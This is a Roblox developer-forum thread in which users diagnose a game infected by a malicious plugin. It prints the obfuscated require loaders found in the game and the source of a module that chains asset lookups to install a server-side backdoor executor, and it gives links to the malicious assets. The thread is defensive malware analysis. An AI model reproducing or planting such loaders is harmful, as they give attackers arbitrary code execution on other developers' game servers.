Agreed, probably too late to salvage. You should take some assets that you need from the game and move to a new place.
1 Like
Thank you all! I appreciate it.
2 Likes
Check your plugins. look at the posts in this post Ignoremodel_<number, 2343, 412> Virus in one of my plugins, can i have some help? - #5 by FastAsFlash_Dev
@OptimalDidko do u have this plugin ?
https://www.roblox.com/library/4958365277/UPDATED-Anti-Virus-Protect-Your-Game
100% backddor
Hold on! I’ll try it! 
Have you seen anything suspicious about your scripts, like the number of lines (if it is more than the script codes require) or the scroll bars if the script and codes are hiding somewhere even the horizontal bar (we can create and hide codes in one line)?
I am wondering if it could be a module.
I just literally check EVERY script in the game.
I found this:
require(1643016165.67*3-0.01).Load()
Ok, delete this too probably. (30 chars)
I just found the virus, the thing you sent here is the virus. I think
Also i’m not sure if its possible but. He used math to do the roblox id thing and his name is LoadingVirus26
Yeah that’s Lua Bytecode (I think)
It’s probably leading to your issue.
Use Venom at is very sensitive and will find scripts that you can not see inside your roblox game. It gives you a choice to clean your game from scripts. https://www.roblox.com/library/4216304328/Venom-Intercept-Malicious-Scripts
Also read this so you do not accidentally delete your game Venom [Intercept Malicious Scripts]
I would recommend Kronos for this situation. Very good plugin.
Odds are that you are using a virus plugin. Go though your plugins and check them for authenticity. You should look at the creators account and check it isn’t a botted plugin. Odds are that you mistakenly installed a bad plugin which is inserting scripts into your workspace each time you load up studio
I have done some maths for this suspicious code. And I was very surprised that it wasn’t a decimal number, it’s an id:
4929048497
Do not use tge place tree plugin. It destroyed my game with so many infections. It was impossible to stop because everytime you try to delete it, it multiplies itself!
I searched the id and find out that it was mentioned in a dev forum topic:
It is indeed a malicious plugin.
And it’s name is “test” (yes it is unoriginal and has high probabilities to be malicious)
This is just an obfuscated form of a require statement.
You can see that the an index of the result of the getfenv function (which returns the environment: a table of variables available to the script in the given scope).
If we do
local environment = getfenv()
environment.print("Hello world!")
We’ll, get Hello world!
Now that we know what getfenv does, we need to find out what the string of numbers does. These numbers are just meant to obfuscate what are actually letters. We can get these letters by running the string.char function on each number.
local numbers = {114, 101, 113, 117, 105, 114, 101}
for _, number in pairs(numbers) do
print(string.char(number))
end
You’ll get require in the output. This shows that the require function is being called.
There are two ways to use require. The first is the most common, and is requiring a script, by it’s object. The second is requiring a script by it’s asset ID. What you’re seeing is the second method.
You can take a look at the cause of your troubles here:
https://www.roblox.com/library/4958213401/AssetMain
If we take a look at the source of this module, we can see that it’s simply this:
local module = {}
--lol!
lol=game:GetService("MarketplaceService"):GetProductInfo(5108221416).Description;local a=string.match(lol,"%d+")require(tonumber(a.."5616"))
return module
This gets the info of the asset with the asset ID 5108221416 (which is just spam), and finds the number in it (which is 510820), and puts 5616. The result of this is it requiring 5108205616.
This goes on and on, and I’m out of time. But, the main thing is that this is untrustworthy, as the owner clearly wants to hide the real code. Regardless, this is definitely the source of your problems and you should just remove the cause of this.
Edit: Oh shoot, this is not only advertising some random model, but this is actually adding a server-side to your game! A server-side is just an executor that doesn’t require any exploit, allows users (who in most cases pay to use it) to execute any code they want on the server. This bypasses filtering-enabled, and is very dangerous to your game.
If you want to investigate further, the module is here (apparently, it’s called Builderx):
https://www.roblox.com/library/4941366797/main
Another Edit: I just found out that the criteria for getting access to the executor is simply being in this group. (This group will probably be deleted soon)
https://www.roblox.com/groups/6091888/hacker-c00lkid#!/about